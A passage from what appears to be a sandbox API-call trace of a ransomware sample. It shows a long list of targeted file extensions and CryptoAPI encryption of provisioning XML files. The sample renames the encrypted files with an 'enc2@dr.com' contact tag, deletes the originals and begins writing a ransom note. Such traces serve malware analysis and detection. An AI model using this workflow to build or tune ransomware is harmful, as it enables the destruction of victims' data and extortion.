.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0172.857] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.858] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.858] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0172.858] ReadFile (in: hFile=0x390, lpBuffer=0xfde188, nNumberOfBytesToRead=0x1f35, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesRead=0x18a640*=0x1f35, lpOverlapped=0x0) returned 1
	[0172.864] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.864] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb000) returned 1
	[0172.866] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.866] CryptCreateHash (in: hProv=0xfcb000, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0172.867] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.867] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0172.867] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.867] CryptDeriveKey (in: hProv=0xfcb000, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb92b0) returned 1
	[0172.867] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.867] CryptEncrypt (in: hKey=0xfb92b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x1f35, dwBufLen=0x1f35 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x1f40) returned 1
	[0172.868] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.868] RtlMoveMemory (in: Destination=0xfe00c8, Source=0xfde188, Length=0x1f35 | out: Destination=0xfe00c8) 
	[0172.868] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.868] CryptEncrypt (in: hKey=0xfb92b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe00c8*, pdwDataLen=0x18a1ec*=0x1f35, dwBufLen=0x1f40 | out: pbData=0xfe00c8*, pdwDataLen=0x18a1ec*=0x1f40) returned 1
	[0172.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.873] CryptDestroyKey (hKey=0xfb92b0) returned 1
	[0172.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.873] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0172.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.873] CryptReleaseContext (hProv=0xfcb000, dwFlags=0x0) returned 1
	[0172.873] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.874] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.874] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0172.876] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 141
	[0172.876] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.877] WriteFile (in: hFile=0x39c, lpBuffer=0xfe00c8*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe00c8*, lpNumberOfBytesWritten=0x18a648*=0x1f40, lpOverlapped=0x0) returned 1
	[0172.880] CloseHandle (hObject=0x39c) returned 1
	[0172.881] CloseHandle (hObject=0x390) returned 1
	[0172.881] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml")) returned 1
	[0172.885] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml")) returned 0
	[0172.885] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a2656d, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1a2656d, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a2656d, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1
	[0172.885] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="..") returned 1
	[0172.885] lstrcmpW (lpString1="MasterDatastore.xml", lpString2=".") returned 1
	[0172.885] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\"
	[0172.886] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\", lpString2="MasterDatastore.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml"
	[0172.886] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml") returned 100
	[0172.886] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.886] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml", cchLength=0x64 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml") returned 0x64
	[0172.886] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.886] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0172.886] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml"
	[0172.887] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml") returned 100
	[0172.887] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.887] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.887] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0172.887] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.888] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0172.888] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.888] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.888] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0172.890] ReadFile (in: hFile=0x390, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x18a640*=0x10f, lpOverlapped=0x0) returned 1
	[0172.894] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.894] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcba18) returned 1
	[0172.896] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.896] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0172.896] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.896] CryptHashData (hHash=0xfb93b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0172.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.897] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb93b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9470) returned 1
	[0172.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.897] CryptEncrypt (in: hKey=0xfb9470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x10f, dwBufLen=0x10f | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x110) returned 1
	[0172.897] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.897] RtlMoveMemory (in: Destination=0xfdc6a8, Source=0xfdcd58, Length=0x10f | out: Destination=0xfdc6a8) 
	[0172.898] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.898] CryptEncrypt (in: hKey=0xfb9470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x10f, dwBufLen=0x110 | out: pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x110) returned 1
	[0172.898] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.898] CryptDestroyKey (hKey=0xfb9470) returned 1
	[0172.898] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.899] CryptDestroyHash (hHash=0xfb93b0) returned 1
	[0172.899] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.899] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0172.899] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.899] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.901] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.901] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0172.902] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 142
	[0172.902] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.902] WriteFile (in: hFile=0x39c, lpBuffer=0xfdc6a8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdc6a8*, lpNumberOfBytesWritten=0x18a648*=0x110, lpOverlapped=0x0) returned 1
	[0172.906] CloseHandle (hObject=0x39c) returned 1
	[0172.907] CloseHandle (hObject=0x390) returned 1
	[0172.907] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml")) returned 1
	[0172.910] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml")) returned 0
	[0172.910] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0172.911] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0172.911] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0172.930] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0172.931] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}"
	[0172.931] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*"
	[0172.931] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.932] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.932] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 108
	[0172.932] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
